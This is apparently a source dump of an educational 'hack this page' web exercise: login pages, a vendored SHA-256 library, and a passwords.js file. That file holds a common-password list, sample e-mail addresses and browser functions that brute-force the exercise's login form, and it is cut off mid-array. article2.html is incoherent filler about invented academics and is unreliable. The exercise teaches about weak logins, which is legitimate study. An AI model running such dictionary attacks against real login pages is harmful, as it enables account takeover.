├── article1.html
├── article2.html
├── img
    └── software-developer.jpg
├── index.html
├── libs
    └── sha256.js
├── login-success.html
├── login.html
├── login.php
├── login2.html
├── passwords.js
├── readme.MD
├── script.js
├── secret-article.html
├── style.css
└── templates
    ├── footer.html
    └── header.html


/article1.html:
--------------------------------------------------------------------------------
Document

IT Security

Hack this page

This page is teeming with security vulnerabilities. Your task is to find these vulnerabilities and exploit them. This way you get to know simple hacking attacks in a playful way. You will see that the art of hacking is considerably easier than you expect.

The exercise consists of 5 parts in total. The tasks get progressively harder. If you manage to solve all tasks 100% on your own, you already have a deep understanding of web development. Congratulations!

In most cases, however, you will not be able to solve the tasks on your own. That is completely normal. For this reason you will of course also get a solution to this exercise. It helps you retrace everything once more down to the smallest detail.

You can find the solution on YouTube. Junus explains in a video exactly how he proceeds. In the end, pages are always analysed in the same way. Junus shows you exactly how he proceeds and how he finds all 5 security vulnerabilities. The whole project naturally has an educational purpose. The point is to understand these mistakes, so that you can avoid them in your daily work as a programmer.

I do not know the full extent of this material for a specific reason, but John Brown's

Have fun with the tasks!

--------------------------------------------------------------------------------
/article2.html:
--------------------------------------------------------------------------------
Document

HTML, JavaScript and Angular

The best combination for beginners

This is an essay by Paul W. Hartnett, an Englishman and former student at Brigham Young University. W. Hartnett, who was working as an Assistant to the President during the Second World War, studied literature and business matters at Brigham Young University. He also had a doctorate in Political Science, History and Philosophy, and was also a member of the Historical Studies Department. You can read more about him here.

There is more about Paul Hartnett here. He also spoke with Peter Storlick about his work in politics and economics, and what goes into his academic success. On that topic he speaks about The Problem of Religion, and his recent book, The New Politics of Religion, discusses politics, economics, history, and the economic system and the United States at the University of Wyoming.

This is John Brown's piece here. John Brown was an assistant professor of Political Science at Brigham Young University. He participated in various political campaigns and held discussions with politicians of all political stripes including the Republicans and Democrats, and in many ways he was a "reformer". He received a B.A. in Political Science and he wrote six books and an audio series on politics at Brigham Young University.

John Brown's writing on politics and economics is mostly related to the politics of the United States.

I do not know the full extent of this material for a specific reason, but John Brown's

--------------------------------------------------------------------------------
/img/software-developer.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/JunusErgin/hackme-part2/474b2535c4e93434361e84041fd9d388dd8857d4/img/software-developer.jpg

--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
News from the hacker world

Login form

Hack this password

On this page you will find a password field. Your task is to guess the password.

(Read more)

Login form

Can you crack this login?

This task is a bit harder. You additionally need an e-mail address. Have fun!

(Read more)

67 | 68 | 69 | -------------------------------------------------------------------------------- /libs/sha256.js: -------------------------------------------------------------------------------- 1 | /** 2 | * [js-sha256]{@link https://github.com/emn178/js-sha256} 3 | * 4 | * @version 0.9.0 5 | * @author Chen, Yi-Cyuan [emn178@gmail.com] 6 | * @copyright Chen, Yi-Cyuan 2014-2017 7 | * @license MIT 8 | */ 9 | /*jslint bitwise: true */ 10 | (function() { 11 | 'use strict'; 12 | 13 | var ERROR = 'input is invalid type'; 14 | var WINDOW = typeof window === 'object'; 15 | var root = WINDOW ? window : {}; 16 | if (root.JS_SHA256_NO_WINDOW) { 17 | WINDOW = false; 18 | } 19 | var WEB_WORKER = !WINDOW && typeof self === 'object'; 20 | var NODE_JS = !root.JS_SHA256_NO_NODE_JS && typeof process === 'object' && process.versions && process.versions.node; 21 | if (NODE_JS) { 22 | root = global; 23 | } else if (WEB_WORKER) { 24 | root = self; 25 | } 26 | var COMMON_JS = !root.JS_SHA256_NO_COMMON_JS && typeof module === 'object' && module.exports; 27 | var AMD = typeof define === 'function' && define.amd; 28 | var ARRAY_BUFFER = !root.JS_SHA256_NO_ARRAY_BUFFER && typeof ArrayBuffer !== 'undefined'; 29 | var HEX_CHARS = '0123456789abcdef'.split(''); 30 | var EXTRA = [-2147483648, 8388608, 32768, 128]; 31 | var SHIFT = [24, 16, 8, 0]; 32 | var K = [ 33 | 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, 34 | 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 35 | 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, 36 | 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, 37 | 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 38 | 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070, 39 | 0x19a4c116, 0x1e376c08, 0x2748774c, 
0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, 40 | 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2 41 | ]; 42 | var OUTPUT_TYPES = ['hex', 'array', 'digest', 'arrayBuffer']; 43 | 44 | var blocks = []; 45 | 46 | if (root.JS_SHA256_NO_NODE_JS || !Array.isArray) { 47 | Array.isArray = function(obj) { 48 | return Object.prototype.toString.call(obj) === '[object Array]'; 49 | }; 50 | } 51 | 52 | if (ARRAY_BUFFER && (root.JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW || !ArrayBuffer.isView)) { 53 | ArrayBuffer.isView = function(obj) { 54 | return typeof obj === 'object' && obj.buffer && obj.buffer.constructor === ArrayBuffer; 55 | }; 56 | } 57 | 58 | var createOutputMethod = function(outputType, is224) { 59 | return function(message) { 60 | return new Sha256(is224, true).update(message)[outputType](); 61 | }; 62 | }; 63 | 64 | var createMethod = function(is224) { 65 | var method = createOutputMethod('hex', is224); 66 | if (NODE_JS) { 67 | method = nodeWrap(method, is224); 68 | } 69 | method.create = function() { 70 | return new Sha256(is224); 71 | }; 72 | method.update = function(message) { 73 | return method.create().update(message); 74 | }; 75 | for (var i = 0; i < OUTPUT_TYPES.length; ++i) { 76 | var type = OUTPUT_TYPES[i]; 77 | method[type] = createOutputMethod(type, is224); 78 | } 79 | return method; 80 | }; 81 | 82 | var nodeWrap = function(method, is224) { 83 | var crypto = eval("require('crypto')"); 84 | var Buffer = eval("require('buffer').Buffer"); 85 | var algorithm = is224 ? 
'sha224' : 'sha256'; 86 | var nodeMethod = function(message) { 87 | if (typeof message === 'string') { 88 | return crypto.createHash(algorithm).update(message, 'utf8').digest('hex'); 89 | } else { 90 | if (message === null || message === undefined) { 91 | throw new Error(ERROR); 92 | } else if (message.constructor === ArrayBuffer) { 93 | message = new Uint8Array(message); 94 | } 95 | } 96 | if (Array.isArray(message) || ArrayBuffer.isView(message) || 97 | message.constructor === Buffer) { 98 | return crypto.createHash(algorithm).update(new Buffer(message)).digest('hex'); 99 | } else { 100 | return method(message); 101 | } 102 | }; 103 | return nodeMethod; 104 | }; 105 | 106 | var createHmacOutputMethod = function(outputType, is224) { 107 | return function(key, message) { 108 | return new HmacSha256(key, is224, true).update(message)[outputType](); 109 | }; 110 | }; 111 | 112 | var createHmacMethod = function(is224) { 113 | var method = createHmacOutputMethod('hex', is224); 114 | method.create = function(key) { 115 | return new HmacSha256(key, is224); 116 | }; 117 | method.update = function(key, message) { 118 | return method.create(key).update(message); 119 | }; 120 | for (var i = 0; i < OUTPUT_TYPES.length; ++i) { 121 | var type = OUTPUT_TYPES[i]; 122 | method[type] = createHmacOutputMethod(type, is224); 123 | } 124 | return method; 125 | }; 126 | 127 | function Sha256(is224, sharedMemory) { 128 | if (sharedMemory) { 129 | blocks[0] = blocks[16] = blocks[1] = blocks[2] = blocks[3] = 130 | blocks[4] = blocks[5] = blocks[6] = blocks[7] = 131 | blocks[8] = blocks[9] = blocks[10] = blocks[11] = 132 | blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; 133 | this.blocks = blocks; 134 | } else { 135 | this.blocks = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]; 136 | } 137 | 138 | if (is224) { 139 | this.h0 = 0xc1059ed8; 140 | this.h1 = 0x367cd507; 141 | this.h2 = 0x3070dd17; 142 | this.h3 = 0xf70e5939; 143 | this.h4 = 0xffc00b31; 144 | this.h5 = 0x68581511; 145 
| this.h6 = 0x64f98fa7; 146 | this.h7 = 0xbefa4fa4; 147 | } else { // 256 148 | this.h0 = 0x6a09e667; 149 | this.h1 = 0xbb67ae85; 150 | this.h2 = 0x3c6ef372; 151 | this.h3 = 0xa54ff53a; 152 | this.h4 = 0x510e527f; 153 | this.h5 = 0x9b05688c; 154 | this.h6 = 0x1f83d9ab; 155 | this.h7 = 0x5be0cd19; 156 | } 157 | 158 | this.block = this.start = this.bytes = this.hBytes = 0; 159 | this.finalized = this.hashed = false; 160 | this.first = true; 161 | this.is224 = is224; 162 | } 163 | 164 | Sha256.prototype.update = function(message) { 165 | if (this.finalized) { 166 | return; 167 | } 168 | var notString, type = typeof message; 169 | if (type !== 'string') { 170 | if (type === 'object') { 171 | if (message === null) { 172 | throw new Error(ERROR); 173 | } else if (ARRAY_BUFFER && message.constructor === ArrayBuffer) { 174 | message = new Uint8Array(message); 175 | } else if (!Array.isArray(message)) { 176 | if (!ARRAY_BUFFER || !ArrayBuffer.isView(message)) { 177 | throw new Error(ERROR); 178 | } 179 | } 180 | } else { 181 | throw new Error(ERROR); 182 | } 183 | notString = true; 184 | } 185 | var code, index = 0, 186 | i, length = message.length, 187 | blocks = this.blocks; 188 | 189 | while (index < length) { 190 | if (this.hashed) { 191 | this.hashed = false; 192 | blocks[0] = this.block; 193 | blocks[16] = blocks[1] = blocks[2] = blocks[3] = 194 | blocks[4] = blocks[5] = blocks[6] = blocks[7] = 195 | blocks[8] = blocks[9] = blocks[10] = blocks[11] = 196 | blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; 197 | } 198 | 199 | if (notString) { 200 | for (i = this.start; index < length && i < 64; ++index) { 201 | blocks[i >> 2] |= message[index] << SHIFT[i++ & 3]; 202 | } 203 | } else { 204 | for (i = this.start; index < length && i < 64; ++index) { 205 | code = message.charCodeAt(index); 206 | if (code < 0x80) { 207 | blocks[i >> 2] |= code << SHIFT[i++ & 3]; 208 | } else if (code < 0x800) { 209 | blocks[i >> 2] |= (0xc0 | (code >> 6)) << SHIFT[i++ & 3]; 210 | 
blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; 211 | } else if (code < 0xd800 || code >= 0xe000) { 212 | blocks[i >> 2] |= (0xe0 | (code >> 12)) << SHIFT[i++ & 3]; 213 | blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3]; 214 | blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; 215 | } else { 216 | code = 0x10000 + (((code & 0x3ff) << 10) | (message.charCodeAt(++index) & 0x3ff)); 217 | blocks[i >> 2] |= (0xf0 | (code >> 18)) << SHIFT[i++ & 3]; 218 | blocks[i >> 2] |= (0x80 | ((code >> 12) & 0x3f)) << SHIFT[i++ & 3]; 219 | blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3]; 220 | blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; 221 | } 222 | } 223 | } 224 | 225 | this.lastByteIndex = i; 226 | this.bytes += i - this.start; 227 | if (i >= 64) { 228 | this.block = blocks[16]; 229 | this.start = i - 64; 230 | this.hash(); 231 | this.hashed = true; 232 | } else { 233 | this.start = i; 234 | } 235 | } 236 | if (this.bytes > 4294967295) { 237 | this.hBytes += this.bytes / 4294967296 << 0; 238 | this.bytes = this.bytes % 4294967296; 239 | } 240 | return this; 241 | }; 242 | 243 | Sha256.prototype.finalize = function() { 244 | if (this.finalized) { 245 | return; 246 | } 247 | this.finalized = true; 248 | var blocks = this.blocks, 249 | i = this.lastByteIndex; 250 | blocks[16] = this.block; 251 | blocks[i >> 2] |= EXTRA[i & 3]; 252 | this.block = blocks[16]; 253 | if (i >= 56) { 254 | if (!this.hashed) { 255 | this.hash(); 256 | } 257 | blocks[0] = this.block; 258 | blocks[16] = blocks[1] = blocks[2] = blocks[3] = 259 | blocks[4] = blocks[5] = blocks[6] = blocks[7] = 260 | blocks[8] = blocks[9] = blocks[10] = blocks[11] = 261 | blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; 262 | } 263 | blocks[14] = this.hBytes << 3 | this.bytes >>> 29; 264 | blocks[15] = this.bytes << 3; 265 | this.hash(); 266 | }; 267 | 268 | Sha256.prototype.hash = function() { 269 | var a = this.h0, 270 | b = this.h1, 271 | c = 
this.h2, 272 | d = this.h3, 273 | e = this.h4, 274 | f = this.h5, 275 | g = this.h6, 276 | h = this.h7, 277 | blocks = this.blocks, 278 | j, s0, s1, maj, t1, t2, ch, ab, da, cd, bc; 279 | 280 | for (j = 16; j < 64; ++j) { 281 | // rightrotate 282 | t1 = blocks[j - 15]; 283 | s0 = ((t1 >>> 7) | (t1 << 25)) ^ ((t1 >>> 18) | (t1 << 14)) ^ (t1 >>> 3); 284 | t1 = blocks[j - 2]; 285 | s1 = ((t1 >>> 17) | (t1 << 15)) ^ ((t1 >>> 19) | (t1 << 13)) ^ (t1 >>> 10); 286 | blocks[j] = blocks[j - 16] + s0 + blocks[j - 7] + s1 << 0; 287 | } 288 | 289 | bc = b & c; 290 | for (j = 0; j < 64; j += 4) { 291 | if (this.first) { 292 | if (this.is224) { 293 | ab = 300032; 294 | t1 = blocks[0] - 1413257819; 295 | h = t1 - 150054599 << 0; 296 | d = t1 + 24177077 << 0; 297 | } else { 298 | ab = 704751109; 299 | t1 = blocks[0] - 210244248; 300 | h = t1 - 1521486534 << 0; 301 | d = t1 + 143694565 << 0; 302 | } 303 | this.first = false; 304 | } else { 305 | s0 = ((a >>> 2) | (a << 30)) ^ ((a >>> 13) | (a << 19)) ^ ((a >>> 22) | (a << 10)); 306 | s1 = ((e >>> 6) | (e << 26)) ^ ((e >>> 11) | (e << 21)) ^ ((e >>> 25) | (e << 7)); 307 | ab = a & b; 308 | maj = ab ^ (a & c) ^ bc; 309 | ch = (e & f) ^ (~e & g); 310 | t1 = h + s1 + ch + K[j] + blocks[j]; 311 | t2 = s0 + maj; 312 | h = d + t1 << 0; 313 | d = t1 + t2 << 0; 314 | } 315 | s0 = ((d >>> 2) | (d << 30)) ^ ((d >>> 13) | (d << 19)) ^ ((d >>> 22) | (d << 10)); 316 | s1 = ((h >>> 6) | (h << 26)) ^ ((h >>> 11) | (h << 21)) ^ ((h >>> 25) | (h << 7)); 317 | da = d & a; 318 | maj = da ^ (d & b) ^ ab; 319 | ch = (h & e) ^ (~h & f); 320 | t1 = g + s1 + ch + K[j + 1] + blocks[j + 1]; 321 | t2 = s0 + maj; 322 | g = c + t1 << 0; 323 | c = t1 + t2 << 0; 324 | s0 = ((c >>> 2) | (c << 30)) ^ ((c >>> 13) | (c << 19)) ^ ((c >>> 22) | (c << 10)); 325 | s1 = ((g >>> 6) | (g << 26)) ^ ((g >>> 11) | (g << 21)) ^ ((g >>> 25) | (g << 7)); 326 | cd = c & d; 327 | maj = cd ^ (c & a) ^ da; 328 | ch = (g & h) ^ (~g & e); 329 | t1 = f + s1 + ch + K[j + 2] + blocks[j + 
2]; 330 | t2 = s0 + maj; 331 | f = b + t1 << 0; 332 | b = t1 + t2 << 0; 333 | s0 = ((b >>> 2) | (b << 30)) ^ ((b >>> 13) | (b << 19)) ^ ((b >>> 22) | (b << 10)); 334 | s1 = ((f >>> 6) | (f << 26)) ^ ((f >>> 11) | (f << 21)) ^ ((f >>> 25) | (f << 7)); 335 | bc = b & c; 336 | maj = bc ^ (b & d) ^ cd; 337 | ch = (f & g) ^ (~f & h); 338 | t1 = e + s1 + ch + K[j + 3] + blocks[j + 3]; 339 | t2 = s0 + maj; 340 | e = a + t1 << 0; 341 | a = t1 + t2 << 0; 342 | } 343 | 344 | this.h0 = this.h0 + a << 0; 345 | this.h1 = this.h1 + b << 0; 346 | this.h2 = this.h2 + c << 0; 347 | this.h3 = this.h3 + d << 0; 348 | this.h4 = this.h4 + e << 0; 349 | this.h5 = this.h5 + f << 0; 350 | this.h6 = this.h6 + g << 0; 351 | this.h7 = this.h7 + h << 0; 352 | }; 353 | 354 | Sha256.prototype.hex = function() { 355 | this.finalize(); 356 | 357 | var h0 = this.h0, 358 | h1 = this.h1, 359 | h2 = this.h2, 360 | h3 = this.h3, 361 | h4 = this.h4, 362 | h5 = this.h5, 363 | h6 = this.h6, 364 | h7 = this.h7; 365 | 366 | var hex = HEX_CHARS[(h0 >> 28) & 0x0F] + HEX_CHARS[(h0 >> 24) & 0x0F] + 367 | HEX_CHARS[(h0 >> 20) & 0x0F] + HEX_CHARS[(h0 >> 16) & 0x0F] + 368 | HEX_CHARS[(h0 >> 12) & 0x0F] + HEX_CHARS[(h0 >> 8) & 0x0F] + 369 | HEX_CHARS[(h0 >> 4) & 0x0F] + HEX_CHARS[h0 & 0x0F] + 370 | HEX_CHARS[(h1 >> 28) & 0x0F] + HEX_CHARS[(h1 >> 24) & 0x0F] + 371 | HEX_CHARS[(h1 >> 20) & 0x0F] + HEX_CHARS[(h1 >> 16) & 0x0F] + 372 | HEX_CHARS[(h1 >> 12) & 0x0F] + HEX_CHARS[(h1 >> 8) & 0x0F] + 373 | HEX_CHARS[(h1 >> 4) & 0x0F] + HEX_CHARS[h1 & 0x0F] + 374 | HEX_CHARS[(h2 >> 28) & 0x0F] + HEX_CHARS[(h2 >> 24) & 0x0F] + 375 | HEX_CHARS[(h2 >> 20) & 0x0F] + HEX_CHARS[(h2 >> 16) & 0x0F] + 376 | HEX_CHARS[(h2 >> 12) & 0x0F] + HEX_CHARS[(h2 >> 8) & 0x0F] + 377 | HEX_CHARS[(h2 >> 4) & 0x0F] + HEX_CHARS[h2 & 0x0F] + 378 | HEX_CHARS[(h3 >> 28) & 0x0F] + HEX_CHARS[(h3 >> 24) & 0x0F] + 379 | HEX_CHARS[(h3 >> 20) & 0x0F] + HEX_CHARS[(h3 >> 16) & 0x0F] + 380 | HEX_CHARS[(h3 >> 12) & 0x0F] + HEX_CHARS[(h3 >> 8) & 0x0F] + 381 | 
HEX_CHARS[(h3 >> 4) & 0x0F] + HEX_CHARS[h3 & 0x0F] + 382 | HEX_CHARS[(h4 >> 28) & 0x0F] + HEX_CHARS[(h4 >> 24) & 0x0F] + 383 | HEX_CHARS[(h4 >> 20) & 0x0F] + HEX_CHARS[(h4 >> 16) & 0x0F] + 384 | HEX_CHARS[(h4 >> 12) & 0x0F] + HEX_CHARS[(h4 >> 8) & 0x0F] + 385 | HEX_CHARS[(h4 >> 4) & 0x0F] + HEX_CHARS[h4 & 0x0F] + 386 | HEX_CHARS[(h5 >> 28) & 0x0F] + HEX_CHARS[(h5 >> 24) & 0x0F] + 387 | HEX_CHARS[(h5 >> 20) & 0x0F] + HEX_CHARS[(h5 >> 16) & 0x0F] + 388 | HEX_CHARS[(h5 >> 12) & 0x0F] + HEX_CHARS[(h5 >> 8) & 0x0F] + 389 | HEX_CHARS[(h5 >> 4) & 0x0F] + HEX_CHARS[h5 & 0x0F] + 390 | HEX_CHARS[(h6 >> 28) & 0x0F] + HEX_CHARS[(h6 >> 24) & 0x0F] + 391 | HEX_CHARS[(h6 >> 20) & 0x0F] + HEX_CHARS[(h6 >> 16) & 0x0F] + 392 | HEX_CHARS[(h6 >> 12) & 0x0F] + HEX_CHARS[(h6 >> 8) & 0x0F] + 393 | HEX_CHARS[(h6 >> 4) & 0x0F] + HEX_CHARS[h6 & 0x0F]; 394 | if (!this.is224) { 395 | hex += HEX_CHARS[(h7 >> 28) & 0x0F] + HEX_CHARS[(h7 >> 24) & 0x0F] + 396 | HEX_CHARS[(h7 >> 20) & 0x0F] + HEX_CHARS[(h7 >> 16) & 0x0F] + 397 | HEX_CHARS[(h7 >> 12) & 0x0F] + HEX_CHARS[(h7 >> 8) & 0x0F] + 398 | HEX_CHARS[(h7 >> 4) & 0x0F] + HEX_CHARS[h7 & 0x0F]; 399 | } 400 | return hex; 401 | }; 402 | 403 | Sha256.prototype.toString = Sha256.prototype.hex; 404 | 405 | Sha256.prototype.digest = function() { 406 | this.finalize(); 407 | 408 | var h0 = this.h0, 409 | h1 = this.h1, 410 | h2 = this.h2, 411 | h3 = this.h3, 412 | h4 = this.h4, 413 | h5 = this.h5, 414 | h6 = this.h6, 415 | h7 = this.h7; 416 | 417 | var arr = [ 418 | (h0 >> 24) & 0xFF, (h0 >> 16) & 0xFF, (h0 >> 8) & 0xFF, h0 & 0xFF, 419 | (h1 >> 24) & 0xFF, (h1 >> 16) & 0xFF, (h1 >> 8) & 0xFF, h1 & 0xFF, 420 | (h2 >> 24) & 0xFF, (h2 >> 16) & 0xFF, (h2 >> 8) & 0xFF, h2 & 0xFF, 421 | (h3 >> 24) & 0xFF, (h3 >> 16) & 0xFF, (h3 >> 8) & 0xFF, h3 & 0xFF, 422 | (h4 >> 24) & 0xFF, (h4 >> 16) & 0xFF, (h4 >> 8) & 0xFF, h4 & 0xFF, 423 | (h5 >> 24) & 0xFF, (h5 >> 16) & 0xFF, (h5 >> 8) & 0xFF, h5 & 0xFF, 424 | (h6 >> 24) & 0xFF, (h6 >> 16) & 0xFF, (h6 >> 8) & 0xFF, h6 
& 0xFF 425 | ]; 426 | if (!this.is224) { 427 | arr.push((h7 >> 24) & 0xFF, (h7 >> 16) & 0xFF, (h7 >> 8) & 0xFF, h7 & 0xFF); 428 | } 429 | return arr; 430 | }; 431 | 432 | Sha256.prototype.array = Sha256.prototype.digest; 433 | 434 | Sha256.prototype.arrayBuffer = function() { 435 | this.finalize(); 436 | 437 | var buffer = new ArrayBuffer(this.is224 ? 28 : 32); 438 | var dataView = new DataView(buffer); 439 | dataView.setUint32(0, this.h0); 440 | dataView.setUint32(4, this.h1); 441 | dataView.setUint32(8, this.h2); 442 | dataView.setUint32(12, this.h3); 443 | dataView.setUint32(16, this.h4); 444 | dataView.setUint32(20, this.h5); 445 | dataView.setUint32(24, this.h6); 446 | if (!this.is224) { 447 | dataView.setUint32(28, this.h7); 448 | } 449 | return buffer; 450 | }; 451 | 452 | function HmacSha256(key, is224, sharedMemory) { 453 | var i, type = typeof key; 454 | if (type === 'string') { 455 | var bytes = [], 456 | length = key.length, 457 | index = 0, 458 | code; 459 | for (i = 0; i < length; ++i) { 460 | code = key.charCodeAt(i); 461 | if (code < 0x80) { 462 | bytes[index++] = code; 463 | } else if (code < 0x800) { 464 | bytes[index++] = (0xc0 | (code >> 6)); 465 | bytes[index++] = (0x80 | (code & 0x3f)); 466 | } else if (code < 0xd800 || code >= 0xe000) { 467 | bytes[index++] = (0xe0 | (code >> 12)); 468 | bytes[index++] = (0x80 | ((code >> 6) & 0x3f)); 469 | bytes[index++] = (0x80 | (code & 0x3f)); 470 | } else { 471 | code = 0x10000 + (((code & 0x3ff) << 10) | (key.charCodeAt(++i) & 0x3ff)); 472 | bytes[index++] = (0xf0 | (code >> 18)); 473 | bytes[index++] = (0x80 | ((code >> 12) & 0x3f)); 474 | bytes[index++] = (0x80 | ((code >> 6) & 0x3f)); 475 | bytes[index++] = (0x80 | (code & 0x3f)); 476 | } 477 | } 478 | key = bytes; 479 | } else { 480 | if (type === 'object') { 481 | if (key === null) { 482 | throw new Error(ERROR); 483 | } else if (ARRAY_BUFFER && key.constructor === ArrayBuffer) { 484 | key = new Uint8Array(key); 485 | } else if 
(!Array.isArray(key)) { 486 | if (!ARRAY_BUFFER || !ArrayBuffer.isView(key)) { 487 | throw new Error(ERROR); 488 | } 489 | } 490 | } else { 491 | throw new Error(ERROR); 492 | } 493 | } 494 | 495 | if (key.length > 64) { 496 | key = (new Sha256(is224, true)).update(key).array(); 497 | } 498 | 499 | var oKeyPad = [], 500 | iKeyPad = []; 501 | for (i = 0; i < 64; ++i) { 502 | var b = key[i] || 0; 503 | oKeyPad[i] = 0x5c ^ b; 504 | iKeyPad[i] = 0x36 ^ b; 505 | } 506 | 507 | Sha256.call(this, is224, sharedMemory); 508 | 509 | this.update(iKeyPad); 510 | this.oKeyPad = oKeyPad; 511 | this.inner = true; 512 | this.sharedMemory = sharedMemory; 513 | } 514 | HmacSha256.prototype = new Sha256(); 515 | 516 | HmacSha256.prototype.finalize = function() { 517 | Sha256.prototype.finalize.call(this); 518 | if (this.inner) { 519 | this.inner = false; 520 | var innerHash = this.array(); 521 | Sha256.call(this, this.is224, this.sharedMemory); 522 | this.update(this.oKeyPad); 523 | this.update(innerHash); 524 | Sha256.prototype.finalize.call(this); 525 | } 526 | }; 527 | 528 | var exports = createMethod(); 529 | exports.sha256 = exports; 530 | exports.sha224 = createMethod(true); 531 | exports.sha256.hmac = createHmacMethod(); 532 | exports.sha224.hmac = createHmacMethod(true); 533 | 534 | if (COMMON_JS) { 535 | module.exports = exports; 536 | } else { 537 | root.sha256 = exports.sha256; 538 | root.sha224 = exports.sha224; 539 | if (AMD) { 540 | define(function() { 541 | return exports; 542 | }); 543 | } 544 | } 545 | })(); -------------------------------------------------------------------------------- /login-success.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Document 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 |
Congratulations!

You have logged in successfully! You can now continue with the next exercise.

Continue

--------------------------------------------------------------------------------
/login.html:
--------------------------------------------------------------------------------
Document

On this page you have to log in. There is just one problem: you do not know the password. Try to solve the problem.

--------------------------------------------------------------------------------
/login.php:
--------------------------------------------------------------------------------
";

--------------------------------------------------------------------------------
/login2.html:
--------------------------------------------------------------------------------
Document

31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /passwords.js: -------------------------------------------------------------------------------- 1 | let dictionary = [123456, 123456789, 12345, "qwerty", "password", 12345678, 111111, 123123, 1234567890, 1234567, "qwerty123", "000000", "1q2w3e", "aa12345678", "abc123", "password1", 1234, "qwertyuiop", 123321, "password123", "1q2w3e4r5t", "iloveyou", 654321, 666666, 987654321, 123, "123456a", "qwe123", "1q2w3e4r", 7777777, "1qaz2wsx", "123qwe", "zxcvbnm", 121212, "asdasd", "a123456", 555555, "dragon", 112233, 123123123, "monkey", 11111111, "qazwsx", 159753, "asdfghjkl", 222222, "1234qwer", "qwerty1", 123654, "123abc", "asdfgh", 777777, "aaaaaa", "myspace1", 88888888, "fuckyou", "123456789a", 999999, 888888, "football", "princess", 789456123, 147258369, 1111111, "sunshine", "michael", "computer", "qwer1234", "daniel", 789456, 11111, "abcd1234", "q1w2e3r4", "shadow", 159357, "123456q", 1111, "samsung", "killer", "asd123", "superman", "master", "12345a", "azerty", "zxcvbn", "qazwsxedc", 131313, "ashley", "target123", 987654, "baseball", "qwert", "asdasd123", "qwerty", "soccer", "charlie", "qweasdzxc", "tinkle", "jessica", "q1w2e3r4t5", "asdf", "test1", "1g2w3e4r", "gwerty123", "zag12wsx", "gwerty", 147258, 12341234, "qweqwe", "jordan", "pokemon", "q1w2e3r4t5y6", 12345678910, 1111111111, 12344321, "thomas", "love", "12qwaszx", 102030, "welcome", "liverpool", "iloveyou1", "michelle", 101010, 1234561, "hello", "andrew", "a123456789", "a12345", "Status", "fuckyou1", "1qaz2wsx3edc", "hunter", "princess1", "naruto", "justin", "jennifer", "qwerty12", "qweasd", "anthony", "andrea", "joshua", "asdf1234", "12345qwert", "1qazxsw2", "marina", "love123", 111222, "robert", 10203, "nicole", "letmein", "football1", "secret", 1234554321, "freedom", "michael1", 11223344, "qqqqqq", 123654789, "chocolate", "12345q", "internet", "q1w2e3", "google", "starwars", "mynoob", "qwertyui", 55555, 
"qwertyu", "lol123", "lovely", "monkey1", "nikita", "pakistan", 7758521, 87654321, 147852, "jordan23", 212121, 123789, 147852369, "123456789q", "qwe", "forever", 741852963, "123qweasd", "123456abc", "1q2w3e4r5t6y", "qazxsw", 456789, 232323, 999999999, "qwerty12345", "qwaszx", 1234567891, 456123, 444444, "qq123456", "xxx"]; 2 | let emails = [ 3 | 'albert.einstein@hacker-email.com', 4 | 'grace.hopper@hacker-email.com', 5 | 'marie.curie@hacker-email.com', 6 | 'konrad.zuse@hacker-email.com', 7 | 'stephanie-kwolek@hacker-email.com', 8 | 'carl-friedrich.auss@hacker-email.com', 9 | 'shirley-ann.jackson@hacker-email.com', 10 | 'gertrude-belle.elion@hacker-email.com', 11 | 'steve.wozniak@hacker-email.com', 12 | 'rudolf.bayer@hacker-email.com', 13 | 'ada.lovelace@hacker-email.com' 14 | ]; 15 | 16 | let index = 0; 17 | 18 | 19 | function dictionaryAttack() { 20 | let currentPassword = dictionary[index]; 21 | console.log('Testing password', currentPassword); 22 | index++; 23 | password.type = 'text'; 24 | password.value = currentPassword; 25 | loginButton.click(); 26 | if (index < dictionary.length) { 27 | setTimeout(dictionaryAttack, 500); 28 | } 29 | } 30 | 31 | 32 | 33 | 34 | 35 | 36 | function emailDictionaryAttack(i, j) { // i = 0; j = 0 37 | console.log('Testing', emails[i], dictionary[j]); 38 | password.type = 'text'; 39 | username.value = emails[i]; 40 | password.value = dictionary[j]; 41 | loginButton.click(); 42 | 43 | j++; 44 | 45 | if (j >= dictionary.length) { 46 | i++; 47 | j = 0; 48 | } 49 | 50 | if (i < emails.length || j < dictionary.length) { 51 | setTimeout(emailDictionaryAttack, 20, i, j); 52 | } 53 | } 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | let alphabet = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", 